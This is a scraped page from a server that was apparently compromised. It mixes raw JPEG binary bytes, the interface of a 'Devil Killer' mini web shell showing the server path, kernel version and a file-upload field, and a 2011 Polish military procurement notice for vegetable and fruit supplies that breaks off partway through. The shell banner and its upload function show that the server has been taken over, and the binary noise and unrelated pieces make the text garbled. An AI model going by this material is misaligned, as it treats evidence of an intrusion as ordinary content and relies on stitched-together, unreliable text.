JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20110215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20110215/53281-N-2011.html

<p class="kh_header"><b>Łódź: .Przedmiotem zamówienia (sygn. post. PN 1/ŻYW/2011) jest dostawa  warzyw i owoców gr. II na 2011r</b><br>
<b>Numer ogłoszenia: 53281 - 2011; data zamieszczenia: 15.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka  Wojskowa 1933 , ul. Źródłowa 52, 91-735 Łódź, woj. łódzkie, tel. 042 6394760, faks 042 6348985.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.army.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa sektora finansów publicznych-Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> .Przedmiotem zamówienia (sygn. post. PN 1/ŻYW/2011) jest dostawa  warzyw i owoców gr. II na 2011r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.	Kod CPV	Nazwa przedmiotu zamówienia
1.	03221111-7	Buraki ćwikłowe gr. II
2.	03221112-4	Marchew gr. II
3.	03221113-1	Cebula gr. II
4.	03221212-5	Fasola szparagowa gr. II
5.	03221230-7	Papryka słodka gr. II
6.	03221240-0	Pomidory gr. II
7.	03221270-9	Ogórki gr. II
8.	03221320-5	Sałata gr. II
9.	03221410-3	Kapusta biała gr. II
10.	03221420-6	Kalafior gr. II
11.	03221430-9	Brokuły gr. II
12.	03221110-0	Rzodkiewka gr. II
13.	03221110-0	Pietruszka korzeniowa gr. II
14.	03221110-0	Seler korzeniowy gr. II
15.	01121110-0	Por gr. II
16.	01121110-0	Natka pietruszki gr. II
17.	01121110-0	Koperek zielony gr. II
18.	01121110-0	Szczypiorek gr. II
19.	03221110-0	Czosnek gr. II
20.	03222313-0	Truskawka świeża gr. II 
21.	03222321-9	Jabłka wczesne gr. II
22.	03222333-6	Wiśnie świeże gr. II
23.	03222330-5	Czereśnie świeże gr. II
24.	03222334-3	Śliwki świeże gr. II
25.	03222322-6	Gruszki świeże.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5, 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.12.12-5, 03.22.12.30-7, 03.22.12.40-0, 03.22.12.70-9, 03.22.13.20-5, 03.22.14.10-3, 03.22.14.20-6, 03.22.14.30-9, 03.22.11.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 16.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
2.Wysokość wadium uzależniona jest od ilości zadań, na które składana jest oferta. Wysokość wadium dla poszczególnych zadań:
 Zadanie	Wadium (zł)
1	613,00
2	200,00
3	480,00
4	94,00
5	25,00
6	138,00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych w art.22 ust.1 pkt.1ustawy Pzp, muszą prowadzić działalność gospodarczą w przedmiocie realizacji przedmiotu zamówienia-produkcja lub obrót artykułami objętymi niniejszą SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych w art.22 ust.1 pkt.2ustawy Pzp-posiadają niezbędną wiedzę i doświadczenie  - wykonali lub wykonują należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę odpowiadającą swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, tj. dostawę warzyw lub owoców nie mniejszą niż 50% wartości brutto określonej dla zadania , na które składana jest oferta, a w przypadku złożenia oferty na kilka zadań nie mniejszą niż 50 % sumy wartości brutto dla zadań na które składana jest oferta</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych w art.22 ust.1 pkt.3ustawy Pzp-dysponują odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
 - są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności z zakresem ubezpieczenia obejmującym odpowiedzialność za szkody osobowe lub rzeczowe wyrządzone przez produkty wyprodukowane, dostarczone, sprzedane przez ubezpieczonego oraz szkody spowodowane przez niewykonanie lub nienależyte wykonanie zamówienia, przy czym minimalna suma gwarancyjna ubezpieczenia odpowiedzialności cywilnej wynosi 100 000 zł lub jej równowartość wyrażoną w innej walucie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.oświadczenie, iż w procesie produkcji i obrotu oferowanych produktów zostaną zachowane wszystkie   powszechnie obowiązujące wymagania higieniczno-sanitarne, w szczególności polegające na wdrożeniu i stosowaniu zasad dobrej praktyki higienicznej (GHP) oraz opracowaniu, wdrożeniu i stosowaniu zasad systemu HACCP /HACCP nie dotyczy wykonawców uczestniczących wyłącznie w  produkcji podstawowej (pierwotnej)/
2.   decyzję właściwego organu Państwowej Inspekcji Sanitarnej potwierdzającej spełnianie wymagań koniecznych do zapewnienia higieny w procesie produkcji lub/i  w obrocie oraz do zapewnienia właściwej jakości zdrowotnej żywności - dotyczy wykonawców produkujących i/lub wprowadzających do obrotu żywność będących pod nadzorem Państwowej Inspekcji Sanitarnej - wydanej  na podstawie art. 61, art. 62 ust. 1 pkt. 1, 2, art. 63 ust.1 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia;
  3.      zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego systemu HACCP (podstawa prawna art. 59 i 73 ust.1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywieni );
                                                                                lub
      a)      protokół z kontroli sanitarnej przeprowadzonej przez organy Państwowej Inspekcji Sanitarnej jako organ urzędowej kontroli żywności, o którym mowa w art. 4  rozporządzenia (WE) Parlamentu Europejskiego i Rady Unii Europejskiej nr 882/2004 z dnia 29.04.2004 r. w sprawie kontroli urzędowych przeprowadzanych w celu sprawdzenia zgodności z prawem paszowym i żywnościowym oraz regułami dotyczącymi zdrowia zwierząt i dobrostanu zwierząt (Dz. U. UE L 165 z 30.04.2004 z poźn. zm.) w skład którego wchodzi punkt dotyczący oceny opracowania, wdrożenia i utrzymania systemu HACCP (podstawa prawna: art. 9 i 10 rozporządzenia(WE) nr 882/2004  oraz art. 59 i 73 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia);
                                                                                    lub
b)	certyfikat HACCP.
             / nie dotyczy producentów uczestniczących wyłącznie w produkcji pierwotne/j.
       Jeżeli wykonawca nie jest producentem oferowanych produktów, zobowiązany jest dołączyć jeden z powyżej opisanych typów dokumentów wystawionych dla niego i odrębnie dla wszystkich pośredników aż do producentów oferowanych produktów. Jeżeli z tytułu prowadzonej działalności wykonawca lub producent nie podlega obowiązkowi wdrożenia i stosowania systemu HACCP, przedstawia on stosowne zaświadczenia wystawione dla wszystkich  pośredników i/lub producentów podlegających takiemu obowiązkowi..</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.3rbm.sow.mil.pl, www.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 1933 Łódź, ul. Żródłowa 52,Sekcja Zamówien Publicznych pok. 121.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2011 godzina 10:00, miejsce: Oferty należy składać do dnia 01.03. 2011 r. do godziny 10:00 do kancelarii jawnej zamawiającego, bud nr 7, pok. 014-015 w godzinach pracy kancelarii tj. 8:00 - 10:00 i 12:30 - 14:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE 1  Warzywa ( Obszar I  -  woj. łódzkie ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Buraki ćwikłowe gr. II	kg	1880,00
2.	Marchew gr. II	kg	2410,00
3.	Cebula gr. II	kg	1 710,00
4.	Fasola szparagowa gr. II	kg	948,00
5.	Papryka słodka gr. II	kg	900,00
6.	Pomidor gr. II	kg	2 220,00
7.	Ogórki gr. II	kg	2 390,00
8.	Sałata gr. II	kg	1 230,00
9.	Kapusta biała gr. II	kg	2 390,00
10.	Kalafior gr. II	kg	1 350,00
11.	Brokuły gr. II	kg	880,00
12.	Rzodkiewka gr. II	kg	1 005,00
13.	Pietruszka korzeniowa
gr. II	kg	730,00
14.	Seler korzeniowy gr. II	kg	900,00
15.	Por gr. II	kg	870,00
16.	Natka pietruszki gr. II	kg	191,00
17.	Koperek zielony gr. II	kg	181,00
18.	Szczypiorek gr. II	kg	181,00
19.	Czosnek gr. II	kg	59,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5, 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.12.12-5, 03.22.12.30-7, 03.22.12.40-0, 03.22.12.70-9, 03.22.13.20-5, 03.22.14.10-3, 03.22.14.20-6, 03.22.14.30-9, 03.22.11.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE 2 Warzywa ( Obszar II -  woj. śląskie i małopolskie  ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Buraki ćwikłowe  gr. II	kg	1180,00
2.	Marchew gr. II	kg	1490,00
3.	Cebula gr. II	kg	900,00
4.	Fasola szparagowa gr. II	kg	290,00
5.	Papryka słodka gr. II	kg	150,00
6.	Pomidory gr. II	kg	680,00
7.	Ogórki gr. II	kg	680,00
8.	Sałata gr. II	kg	220,00
9.	Kapusta biała gr. II	kg	1 220,00
10.	Kalafior gr. II	kg	555,00
11.	Brokuły gr. II	kg	80,00
12.	Rzodkiewka gr. II	kg	105,00
13.	Pietruszka korzeniowa gr. II	kg	290,00
14.	Seler korzeniowy gr. II	kg	335,00
15.	Por gr. II	kg	325,00
16.	Natka pietruszki gr. II	kg	41,00
17.	Koperek zielony gr. II	kg	46,00
18.	Szczypiorek gr. II	kg	33,00
19.	Czosnek gr. II	kg	37,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5, 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.12.12-5, 03.22.12.30-7, 03.22.12.40-0, 03.22.12.70-9, 03.22.13.20-5, 03.22.14.10-3, 03.22.14.20-6, 03.22.14.30-9, 03.22.11.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE 3 Warzywa  ( Obszar III -  woj. małopolskie świętokrzyskie ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Buraki ćwikłowe gr. II	kg	2 260,00
2.	Marchew gr. II	kg	2 810,00
3.	Cebula gr. II	kg	1 820,00
4.	Fasola szparagowa gr. II	kg	580,00
5.	Papryka słodka gr. II	kg	470,00
6.	Pomidory gr. II	kg	1 630,00
7.	Ogórki gr. II	kg	1 660,00
8.	Sałata gr. II	kg	900,00
9.	Kapusta biała gr. II	kg	2 830,00
10.	Kalafior gr. II	kg	1 140,00
11.	Brokuły gr. II	kg	250,00
12.	Rzodkiewka gr. II	kg	227,00
13.	Pietruszka korzeniowa gr. II	kg	530,00
14.	Seler korzeniowy gr. II	kg	750,00
15.	Por gr. II	kg	570,00
16.	Natka pietruszki gr. II	kg	175,00
17.	Koperek zielony gr. II	kg	195,00
18.	Szczypiorek gr. II	kg	144,00
19.	Czosnek gr. II	kg	131,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5, 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.12.12-5, 03.22.12.30-7, 03.22.12.40-0, 03.22.12.70-9, 03.22.13.20-5, 03.22.14.10-3, 03.22.14.20-6, 03.22.14.30-9, 03.22.11.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE 4 Owoce ( Obszar I  -  woj. łódzkie ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Truskawka świeża gr. II	kg	560,00
2	Jabłka wczesne gr. II	kg	2 050,00
3	Wiśnia Świeża gr. II	kg	580,00
4	Czereśnie świeże gr. II	kg	280,00
5	Śliwki świeże gr. II	kg	400,00
6	Gruszki świeże gr. II	kg	370,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5, 03.22.23.13-0, 03.22.23.21-9, 03.22.23.33-6, 03.22.23.30-5, 03.22.23.34-3, 03.22.23.22-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE 5 Owoce ( Obszar II -  woj. śląskie i małopolskie ).</p>
